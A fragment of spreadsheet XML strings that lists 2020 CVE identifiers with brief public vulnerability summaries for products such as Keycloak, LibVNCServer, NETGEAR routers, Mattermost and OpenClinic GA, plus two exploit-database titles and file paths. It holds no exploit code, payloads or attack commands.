  <si>
    <t>CVE-2020-14389</t>
  </si>
  <si>
    <t>It was found that Keycloak before version 12.0.0 would permit a user with only view-profile role to manage the resources in the new account console, allowing access and modification of data the user was not intended to have.</t>
  </si>
  <si>
    <t>CVE-2020-1439</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in PerformancePoint Services for SharePoint Server when the software fails to check the source markup of XML file input, aka 'PerformancePoint Services Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14390</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel in versions before 5.9-rc6. When changing screen size, an out-of-bounds memory write can occur leading to memory corruption or a denial of service. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.</t>
  </si>
  <si>
    <t>CVE-2020-14391</t>
  </si>
  <si>
    <t>A flaw was found in the GNOME Control Center in Red Hat Enterprise Linux 8 versions prior to 8.2, where it improperly uses Red Hat Customer Portal credentials when a user registers a system through the GNOME Settings User Interface. This flaw allows a local attacker to discover the Red Hat Customer Portal password. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-14392</t>
  </si>
  <si>
    <t>An untrusted pointer dereference flaw was found in Perl-DBI &lt; 1.643. A local attacker who is able to manipulate calls to dbd_db_login6_sv() could cause memory corruption, affecting the service's availability.</t>
  </si>
  <si>
    <t>CVE-2020-14393</t>
  </si>
  <si>
    <t>A buffer overflow was found in perl-DBI &lt; 1.643 in DBI.xs. A local attacker who is able to supply a string longer than 300 characters could cause an out-of-bounds write, affecting the availability of the service or integrity of data.</t>
  </si>
  <si>
    <t>CVE-2020-14394</t>
  </si>
  <si>
    <t>An infinite loop flaw was found in the USB xHCI controller emulation of QEMU while computing the length of the Transfer Request Block (TRB) Ring. This flaw allows a privileged guest user to hang the QEMU process on the host, resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-14396</t>
  </si>
  <si>
    <t>An issue was discovered in LibVNCServer before 0.9.13. libvncclient/tls_openssl.c has a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-14397</t>
  </si>
  <si>
    <t>An issue was discovered in LibVNCServer before 0.9.13. libvncserver/rfbregion.c has a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-14398</t>
  </si>
  <si>
    <t>An issue was discovered in LibVNCServer before 0.9.13. An improperly closed TCP connection causes an infinite loop in libvncclient/sockets.c.</t>
  </si>
  <si>
    <t>CVE-2020-14399</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in LibVNCServer before 0.9.13. Byte-aligned data is accessed through uint32_t pointers in libvncclient/rfbproto.c. NOTE: there is reportedly "no trust boundary crossed."</t>
  </si>
  <si>
    <t>CVE-2020-1440</t>
  </si>
  <si>
    <t>A tampering vulnerability exists when Microsoft SharePoint Server fails to properly handle profile data, aka 'Microsoft SharePoint Server Tampering Vulnerability'. This CVE ID is unique from CVE-2020-1523.</t>
  </si>
  <si>
    <t>CVE-2020-14400</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in LibVNCServer before 0.9.13. Byte-aligned data is accessed through uint16_t pointers in libvncserver/translate.c. NOTE: Third parties do not consider this to be a vulnerability as there is no known path of exploitation or cross of a trust boundary.</t>
  </si>
  <si>
    <t>CVE-2020-14401</t>
  </si>
  <si>
    <t>An issue was discovered in LibVNCServer before 0.9.13. libvncserver/scale.c has a pixel_value integer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-14402</t>
  </si>
  <si>
    <t>An issue was discovered in LibVNCServer before 0.9.13. libvncserver/corre.c allows out-of-bounds access via encodings.</t>
  </si>
  <si>
    <t>CVE-2020-14403</t>
  </si>
  <si>
    <t>An issue was discovered in LibVNCServer before 0.9.13. libvncserver/hextile.c allows out-of-bounds access via encodings.</t>
  </si>
  <si>
    <t>CVE-2020-14404</t>
  </si>
  <si>
    <t>An issue was discovered in LibVNCServer before 0.9.13. libvncserver/rre.c allows out-of-bounds access via encodings.</t>
  </si>
  <si>
    <t>CVE-2020-14405</t>
  </si>
  <si>
    <t>An issue was discovered in LibVNCServer before 0.9.13. libvncclient/rfbproto.c does not limit TextChat size.</t>
  </si>
  <si>
    <t>CVE-2020-14408</t>
  </si>
  <si>
    <t>An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector.</t>
  </si>
  <si>
    <t>CVE-2020-14409</t>
  </si>
  <si>
    <t>SDL (Simple DirectMedia Layer) through 2.0.12 has an Integer Overflow (and resultant SDL_memcpy heap corruption) in SDL_BlitCopy in video/SDL_blit_copy.c via a crafted .BMP file.</t>
  </si>
  <si>
    <t>CVE-2020-14410</t>
  </si>
  <si>
    <t>SDL (Simple DirectMedia Layer) through 2.0.12 has a heap-based buffer over-read in Blit_3or4_to_3or4__inversed_rgb in video/SDL_blit_N.c via a crafted .BMP file.</t>
  </si>
  <si>
    <t>CVE-2020-14412</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to Remote Command Execution. System-Snapshot.php improperly escapes shell metacharacters from a POST request. An attacker can exploit this by crafting an arbitrary payload (any system commands) that contains shell metacharacters via a POST request with a psw parameter. (This can also be exploited via CSRF.)</t>
  </si>
  <si>
    <t>CVE-2020-14413</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.</t>
  </si>
  <si>
    <t>CVE-2020-14414</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to Remote Command Execution. pwsec.php improperly escapes shell metacharacters from a POST request. An attacker can exploit this by crafting an arbitrary payload (any system commands) that contains shell metacharacters via a POST request with a pw parameter. (This can also be exploited via CSRF.)</t>
  </si>
  <si>
    <t>CVE-2020-14415</t>
  </si>
  <si>
    <t>oss_write in audio/ossaudio.c in QEMU before 5.0.0 mishandles a buffer position.</t>
  </si>
  <si>
    <t>CVE-2020-14416</t>
  </si>
  <si>
    <t>In the Linux kernel before 5.4.16, a race condition in tty-&gt;disc_data handling in the slip and slcan line discipline could lead to a use-after-free, aka CID-0ace17d56824. This affects drivers/net/slip/slip.c and drivers/net/can/slcan.c.</t>
  </si>
  <si>
    <t>CVE-2020-14418</t>
  </si>
  <si>
    <t>A TOCTOU vulnerability exists in madCodeHook before 2020-07-16 that allows local attackers to elevate their privileges to SYSTEM. This occurs because path redirection can occur via vectors involving directory junctions.</t>
  </si>
  <si>
    <t>CVE-2020-1442</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when an Office Web Apps server does not properly sanitize a specially crafted request, aka 'Office Web Apps XSS Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/windows/local/48982.pdf</t>
  </si>
  <si>
    <t>Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)</t>
  </si>
  <si>
    <t>2020-11-02</t>
  </si>
  <si>
    <t>CVE-2020-14421</t>
  </si>
  <si>
    <t>aaPanel through 6.6.6 allows remote authenticated users to execute arbitrary commands via the Script Content box on the Add Cron Job screen.</t>
  </si>
  <si>
    <t>CVE-2020-14422</t>
  </si>
  <si>
    <t>Lib/ipaddress.py in Python through 3.8.3 improperly computes hash values in the IPv4Interface and IPv6Interface classes, which might allow a remote attacker to cause a denial of service if an application is affected by the performance of a dictionary containing IPv4Interface or IPv6Interface objects, and this attacker can cause many dictionary entries to be created. This is fixed in: v3.5.10, v3.5.10rc1; v3.6.12; v3.7.9; v3.8.4, v3.8.4rc1, v3.8.5, v3.8.6, v3.8.6rc1; v3.9.0, v3.9.0b4, v3.9.0b5, v3.9.0rc1, v3.9.0rc2.</t>
  </si>
  <si>
    <t>CVE-2020-14423</t>
  </si>
  <si>
    <t>Convos before 4.20 does not properly generate a random secret in Core/Settings.pm and Util.pm. This leads to a predictable CONVOS_LOCAL_SECRET value, affecting password resets and invitations.</t>
  </si>
  <si>
    <t>CVE-2020-14424</t>
  </si>
  <si>
    <t>Cacti before 1.2.18 allows remote attackers to trigger XSS via template import for the midwinter theme.</t>
  </si>
  <si>
    <t>CVE-2020-14425</t>
  </si>
  <si>
    <t>Foxit Reader before 10.0 allows Remote Command Execution via the app.opencPDFWebPage JavsScript API. An attacker can execute local files and bypass the security dialog.</t>
  </si>
  <si>
    <t>CVE-2020-14426</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBK853 before 3.2.10.11, RBR850 before 3.2.10.11, RBS850 before 3.2.10.11, RBK842 before 3.2.10.11, RBR840 before 3.2.10.11, and RBS840 before 3.2.10.11.</t>
  </si>
  <si>
    <t>CVE-2020-14427</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK842 before 3.2.15.25, RBR840 before 3.2.15.25, RBS840 before 3.2.15.25, RBK852 before 3.2.15.25, RBK853 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25.</t>
  </si>
  <si>
    <t>CVE-2020-14428</t>
  </si>
  <si>
    <t>CVE-2020-14429</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects MK62 before 1.0.4.92, MK63 before 1.0.4.92, MR60 before 1.0.4.92, MS60 before 1.0.4.92, RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBS750 before 3.2.15.25, RBR750 before 3.2.15.25, RBK842 before 3.2.15.25, RBR840 before 3.2.15.25, RBS840 before 3.2.15.25, RBK852 before 3.2.15.25, RBK853 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25.</t>
  </si>
  <si>
    <t>CVE-2020-1443</t>
  </si>
  <si>
    <t>CVE-2020-14430</t>
  </si>
  <si>
    <t>CVE-2020-14431</t>
  </si>
  <si>
    <t>CVE-2020-14432</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by CSRF. This affects RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK842 before 3.2.15.25, RBR840 before 3.2.15.25, RBS840 before 3.2.15.25, RBK852 before 3.2.15.25, RBK853 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25.</t>
  </si>
  <si>
    <t>CVE-2020-14433</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects RBK852 before 3.2.15.25, RBK853 before 3.2.15.25, RBK842 before 3.2.15.25, RBR850 before 3.2.15.25, RBS850 before 3.2.15.25, RBR840 before 3.2.15.25, RBS840 before 3.2.15.25, RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBR750 before 3.2.15.25, and RBS750 before 3.2.15.25.</t>
  </si>
  <si>
    <t>CVE-2020-14434</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBK853 before 3.2.15.25, RBR850 before 3.2.15.25, RBS850 before 3.2.15.25, RBK842 before 3.2.15.25, RBR840 before 3.2.15.25, and RBS840 before 3.2.15.25.</t>
  </si>
  <si>
    <t>CVE-2020-14435</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects SRK60 before 2.5.2.104, SRS60 before 2.5.2.104, SRR60 before 2.5.2.104, SRK60B03 before 2.5.2.104, SRK60B04 before 2.5.2.104, SRK60B05 before 2.5.2.104, and SRK60B06 before 2.5.2.104.</t>
  </si>
  <si>
    <t>CVE-2020-14436</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBK853 before 3.2.15.25, RBR850 before 3.2.15.25, RBS850 before 3.2.15.25, RBK842 before 3.2.15.25, RBR840 before 3.2.15.25, and RBS840 before 3.2.15.25.</t>
  </si>
  <si>
    <t>CVE-2020-14437</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK842 before 3.2.15.25, RBR840 before 3.2.15.25, RBS840 before 3.2.15.25, RBK852 before 3.2.15.25, RBK853 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25.</t>
  </si>
  <si>
    <t>CVE-2020-14438</t>
  </si>
  <si>
    <t>CVE-2020-14439</t>
  </si>
  <si>
    <t>CVE-2020-1444</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way Microsoft SharePoint software parses specially crafted email messages, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14440</t>
  </si>
  <si>
    <t>CVE-2020-14441</t>
  </si>
  <si>
    <t>CVE-2020-14442</t>
  </si>
  <si>
    <t>CVE-2020-14443</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in accountancy/customer/card.php in Dolibarr 11.0.3 allows remote authenticated users to execute arbitrary SQL commands via the id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-14444</t>
  </si>
  <si>
    <t>An issue was discovered in WSO2 Identity Server through 5.9.0 and WSO2 IS as Key Manager through 5.9.0. A potential Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Management Console Policy Administration user interface.</t>
  </si>
  <si>
    <t>CVE-2020-14445</t>
  </si>
  <si>
    <t>An issue was discovered in WSO2 Identity Server through 5.9.0 and WSO2 IS as Key Manager through 5.9.0. A potential Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Management Console Basic Policy Editor user Interface.</t>
  </si>
  <si>
    <t>CVE-2020-14446</t>
  </si>
  <si>
    <t>An issue was discovered in WSO2 Identity Server through 5.10.0 and WSO2 IS as Key Manager through 5.10.0. An open redirect exists.</t>
  </si>
  <si>
    <t>CVE-2020-14447</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Server before 5.23.0. Large webhook requests allow attackers to cause a denial of service (infinite loop), aka MMSA-2020-0021.</t>
  </si>
  <si>
    <t>CVE-2020-14448</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Server before 5.23.0. Automatic direct message replies allow attackers to cause a denial of service (infinite loop), aka MMSA-2020-0020.</t>
  </si>
  <si>
    <t>CVE-2020-14449</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Mobile Apps before 1.30.0. Authorization tokens can sometimes be disclosed to third-party servers, aka MMSA-2020-0018.</t>
  </si>
  <si>
    <t>CVE-2020-1445</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft Office improperly discloses the contents of its memory, aka 'Microsoft Office Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1342.</t>
  </si>
  <si>
    <t>CVE-2020-14450</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Server before 5.22.0. The markdown renderer allows attackers to cause a denial of service (client-side), aka MMSA-2020-0017.</t>
  </si>
  <si>
    <t>CVE-2020-14451</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Mobile Apps before 1.29.0. The iOS app allowed Single Sign-On cookies and Local Storage to remain after a logout, aka MMSA-2020-0013.</t>
  </si>
  <si>
    <t>CVE-2020-14452</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Server before 5.21.0. mmctl allows directory traversal via HTTP, aka MMSA-2020-0014.</t>
  </si>
  <si>
    <t>CVE-2020-14453</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Server before 5.21.0. Socket read operations are not appropriately restricted, which allows attackers to cause a denial of service, aka MMSA-2020-0005.</t>
  </si>
  <si>
    <t>CVE-2020-14454</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Desktop App before 4.4.0. Attackers can open web pages in the desktop application because server redirection is mishandled, aka MMSA-2020-0008.</t>
  </si>
  <si>
    <t>CVE-2020-14455</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Desktop App before 4.4.0. Prompting for HTTP Basic Authentication is mishandled, allowing phishing, aka MMSA-2020-0007.</t>
  </si>
  <si>
    <t>CVE-2020-14456</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Desktop App before 4.4.0. The Same Origin Policy is mishandled during access-control decisions for web APIs, aka MMSA-2020-0006.</t>
  </si>
  <si>
    <t>CVE-2020-14457</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Server before 5.20.0. Non-members can receive broadcasted team details via the update_team WebSocket event, aka MMSA-2020-0012.</t>
  </si>
  <si>
    <t>CVE-2020-14458</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Server before 5.19.0. Attackers can discover private channels via the "get channel by name" API, aka MMSA-2020-0004.</t>
  </si>
  <si>
    <t>CVE-2020-14459</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Server before 5.19.0. Attackers can rename a channel and cause a collision with a direct message, aka MMSA-2020-0002.</t>
  </si>
  <si>
    <t>CVE-2020-1446</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1447, CVE-2020-1448.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48669.txt</t>
  </si>
  <si>
    <t>Zyxel Armor X1 WAP6806 - Directory Traversal</t>
  </si>
  <si>
    <t>2020-07-15</t>
  </si>
  <si>
    <t>CVE-2020-14460</t>
  </si>
  <si>
    <t>An issue was discovered in Mattermost Server before 5.19.0, 5.18.1, 5.17.3, 5.16.5, and 5.9.8. Creation of a trusted OAuth application does not always require admin privileges, aka MMSA-2020-0001.</t>
  </si>
  <si>
    <t>CVE-2020-14461</t>
  </si>
  <si>
    <t>Zyxel Armor X1 WAP6806 1.00(ABAL.6)C0 devices allow Directory Traversal via the images/eaZy/ URI.</t>
  </si>
  <si>
    <t>CVE-2020-14462</t>
  </si>
  <si>
    <t>CALDERA 2.7.0 allows XSS via the Operation Name box.</t>
  </si>
  <si>
    <t>CVE-2020-1447</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1446, CVE-2020-1448.</t>
  </si>
  <si>
    <t>CVE-2020-14470</t>
  </si>
  <si>
    <t>In Octopus Deploy 2018.8.0 through 2019.x before 2019.12.2, an authenticated user with could trigger a deployment that leaks the Helm Chart repository password.</t>
  </si>
  <si>
    <t>CVE-2020-14472</t>
  </si>
  <si>
    <t>On Draytek Vigor3900, Vigor2960, and Vigor 300B devices before 1.5.1.1, there are some command-injection vulnerabilities in the mainfunction.cgi file.</t>
  </si>
  <si>
    <t>CVE-2020-14473</t>
  </si>
  <si>
    <t>Stack-based buffer overflow vulnerability in Vigor3900, Vigor2960, and Vigor300B with firmware before 1.5.1.1.</t>
  </si>
  <si>
    <t>CVE-2020-14474</t>
  </si>
  <si>
    <t>The Cellebrite UFED physical device 5.0 through 7.5.0.845 relies on key material hardcoded within both the executable code supporting the decryption process, and within the encrypted files themselves by using a key enveloping technique. The recovered key material is the same for every device running the same version of the software, and does not appear to be changed with each new build. It is possible to reconstruct the decryption process using the hardcoded key material and obtain easy access to otherwise protected data.</t>
  </si>
  <si>
    <t>CVE-2020-14475</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in Dolibarr 11.0.3 allows remote attackers to inject arbitrary web script or HTML into public/notice.php (related to transphrase and transkey).</t>
  </si>
  <si>
    <t>CVE-2020-14477</t>
  </si>
  <si>
    <t>In Philips Ultrasound ClearVue Versions 3.2 and prior, Ultrasound CX Versions 5.0.2 and prior, Ultrasound EPIQ/Affiniti Versions VM5.0 and prior, Ultrasound Sparq Version 3.0.2 and prior and Ultrasound Xperius all versions, an attacker may use an alternate path or channel that does not require authentication of the alternate service login to view or modify information.</t>
  </si>
  <si>
    <t>CVE-2020-14478</t>
  </si>
  <si>
    <t>A local, authenticated attacker could use an XML External Entity (XXE) attack to exploit weakly configured XML files to access local or remote content. A successful exploit could potentially cause a denial-of-service condition and allow the attacker to arbitrarily read any local file via system-level services.</t>
  </si>
  <si>
    <t>CVE-2020-14479</t>
  </si>
  <si>
    <t>Sensitive information can be obtained through the handling of serialized data. The issue results from the lack of proper authentication required to query the server</t>
  </si>
  <si>
    <t>CVE-2020-1448</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1446, CVE-2020-1447.</t>
  </si>
  <si>
    <t>CVE-2020-14480</t>
  </si>
  <si>
    <t>Due to usernames/passwords being stored in plaintext in Random Access Memory (RAM), a local, authenticated attacker could gain access to certain credentials, including Windows Logon credentials.</t>
  </si>
  <si>
    <t>CVE-2020-14481</t>
  </si>
  <si>
    <t>The DeskLock tool provided with FactoryTalk View SE uses a weak encryption algorithm that may allow a local, authenticated attacker to decipher user credentials, including the Windows user or Windows DeskLock passwords. If the compromised user has an administrative account, an attacker could gain full access to the user’s operating system and certain components of FactoryTalk View SE.</t>
  </si>
  <si>
    <t>CVE-2020-14482</t>
  </si>
  <si>
    <t>Delta Industrial Automation DOPSoft, Version 4.00.08.15 and prior. Opening a specially crafted project file may overflow the heap, which may allow remote code execution, disclosure/modification of information, or cause the application to crash.</t>
  </si>
  <si>
    <t>CVE-2020-14483</t>
  </si>
  <si>
    <t>A timeout during a TLS handshake can result in the connection failing to terminate. This can result in a Niagara thread hanging and requires a manual restart of Niagara (Versions 4.6.96.28, 4.7.109.20, 4.7.110.32, 4.8.0.110) and Niagara Enterprise Security (Versions 2.4.31, 2.4.45, 4.8.0.35) to correct.</t>
  </si>
  <si>
    <t>CVE-2020-14484</t>
  </si>
  <si>
    <t>OpenClinic GA versions 5.09.02 and 5.89.05b may allow an attacker to bypass the system’s account lockout protection, which may allow brute force password attacks.</t>
  </si>
  <si>
    <t>CVE-2020-14485</t>
  </si>
  <si>
    <t>OpenClinic GA versions 5.09.02 and 5.89.05b may allow an attacker to bypass client-side access controls or use a crafted request to initiate a session with limited functionality, which may allow execution of admin functions such as SQL queries.</t>
  </si>
  <si>
    <t>CVE-2020-14486</t>
  </si>
  <si>
    <t>An attacker may bypass permission/authorization checks in OpenClinic GA 5.09.02 and 5.89.05b by ignoring the redirect of a permission failure, which may allow unauthorized execution of commands.</t>
  </si>
  <si>
    <t>CVE-2020-14487</t>
  </si>
  <si>
    <t>OpenClinic GA 5.09.02 contains a hidden default user account that may be accessed if an administrator has not expressly turned off this account, which may allow an attacker to login and execute arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-14488</t>
  </si>
  <si>
    <t>OpenClinic GA 5.09.02 and 5.89.05b does not properly verify uploaded files, which may allow a low-privilege user to upload and execute arbitrary files on the system.</t>
  </si>
  <si>
    <t>CVE-2020-14489</t>
  </si>
  <si>
    <t>OpenClinic GA 5.09.02 and 5.89.05b stores passwords using inadequate hashing complexity, which may allow an attacker to recover passwords using known password cracking techniques.</t>
  </si>
  <si>
    <t>CVE-2020-1449</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Project software when the software fails to check the source markup of a file, aka 'Microsoft Project Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14490</t>
  </si>
  <si>
    <t>OpenClinic GA 5.09.02 and 5.89.05b includes arbitrary local files specified within its parameter and executes some files, which may allow disclosure of sensitive files or the execution of malicious uploaded files.</t>
  </si>
  <si>
    <t>CVE-2020-14491</t>
  </si>
  <si>
    <t>OpenClinic GA versions 5.09.02 and 5.89.05b do not properly check permissions before executing SQL queries, which may allow a low-privilege user to access privileged information.</t>
  </si>
  <si>
    <t>CVE-2020-14492</t>
  </si>
  <si>
    <t>OpenClinic GA 5.09.02 and 5.89.05b does not properly neutralize user-controllable input, which may allow the execution of malicious code within the user’s browser.</t>
  </si>
  <si>
    <t>CVE-2020-14493</t>
  </si>
  <si>
    <t>A low-privilege user may use SQL syntax to write arbitrary files to the OpenClinic GA 5.09.02 and 5.89.05b server, which may allow the execution of arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-14494</t>
  </si>
  <si>
    <t>OpenClinic GA versions 5.09.02 and 5.89.05b contain an authentication mechanism within the system that does not provide sufficient complexity to protect against brute force attacks, which may allow unauthorized users to access the system after no more than a fixed maximum number of attempts.</t>
  </si>
  <si>
    <t>CVE-2020-14496</t>
  </si>
  <si>
    <t>Successful exploitation of this vulnerability for multiple Mitsubishi Electric Factory Automation Engineering Software Products of various versions could allow an attacker to escalate privilege and execute malicious programs, which could cause a denial-of-service condition, and allow information to be disclosed, tampered with, and/or destroyed.</t>
  </si>
  <si>
    <t>CVE-2020-14497</t>
  </si>
  <si>
    <t>Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2020-14498</t>
  </si>
  <si>
    <t>HMS Industrial Networks AB eCatcher all versions prior to 6.5.5. The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-14499</t>
  </si>
  <si>
    <t>Advantech iView, versions 5.6 and prior, has an improper access control vulnerability. Successful exploitation of this vulnerability may allow an attacker to obtain all user accounts credentials.</t>
  </si>
  <si>
    <t>CVE-2020-1450</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1451, CVE-2020-1456.</t>
  </si>
  <si>
    <t>CVE-2020-14500</t>
  </si>
  <si>
    <t>Secomea GateManager all versions prior to 9.2c, An attacker can send a negative value and overwrite arbitrary data.</t>
  </si>
  <si>
    <t>CVE-2020-14501</t>
  </si>
  <si>
    <t>Advantech iView, versions 5.6 and prior, has an improper authentication for critical function (CWE-306) issue. Successful exploitation of this vulnerability may allow an attacker to obtain the information of the user table, including the administrator credentials in plain text. An attacker may also delete the administrator account.</t>
  </si>
  <si>
    <t>CVE-2020-14502</t>
  </si>
  <si>
    <t>The web interface of the 1734-AENTR communication module is vulnerable to stored XSS. A remote, unauthenticated attacker could store a malicious script within the web interface that, when executed, could modify some string values on the homepage of the web interface.</t>
  </si>
  <si>
    <t>CVE-2020-14503</t>
  </si>
  <si>
    <t>Advantech iView, versions 5.6 and prior, has an improper input validation vulnerability. Successful exploitation of this vulnerability could allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-14504</t>
  </si>
  <si>
    <t>The web interface of the 1734-AENTR communication module mishandles authentication for HTTP POST requests. A remote, unauthenticated attacker can send a crafted request that may allow for modification of the configuration settings.</t>
  </si>
  <si>
    <t>CVE-2020-14505</t>
  </si>
  <si>
    <t>Advantech iView, versions 5.6 and prior, has an improper neutralization of special elements used in a command (“command injection”) vulnerability. Successful exploitation of this vulnerability may allow an attacker to send a HTTP GET or POST request that creates a command string without any validation. The attacker may then remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2020-14506</t>
  </si>
  <si>
    <t>Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The product receives input or data, but it does not validate or incorrectly validates that the input has the properties required to process the data safely and correctly.</t>
  </si>
  <si>
    <t>CVE-2020-14507</t>
  </si>
  <si>
    <t>Advantech iView, versions 5.6 and prior, is vulnerable to multiple path traversal vulnerabilities that could allow an attacker to create/download arbitrary files, limit system availability, and remotely execute code.</t>
  </si>
  <si>
    <t>CVE-2020-14508</t>
  </si>
  <si>
    <t>GateManager versions prior to 9.2c, The affected product is vulnerable to an off-by-one error, which may allow an attacker to remotely execute arbitrary code or cause a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2020-14509</t>
  </si>
  <si>
    <t>Multiple memory corruption vulnerabilities exist in CodeMeter (All versions prior to 7.10) where the packet parser mechanism does not verify length fields. An attacker could send specially crafted packets to exploit these vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-1451</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1450, CVE-2020-1456.</t>
  </si>
  <si>
    <t>CVE-2020-14510</t>
  </si>
  <si>
    <t>GateManager versions prior to 9.2c, The affected product contains a hard-coded credential for telnet, allowing an unprivileged attacker to execute commands as root.</t>
  </si>
  <si>
    <t>CVE-2020-14511</t>
  </si>
  <si>
    <t>Malicious operation of the crafted web browser cookie may cause a stack-based buffer overflow in the system web server on the EDR-G902 and EDR-G903 Series Routers (versions prior to 5.4).</t>
  </si>
  <si>
    <t>CVE-2020-14512</t>
  </si>
  <si>
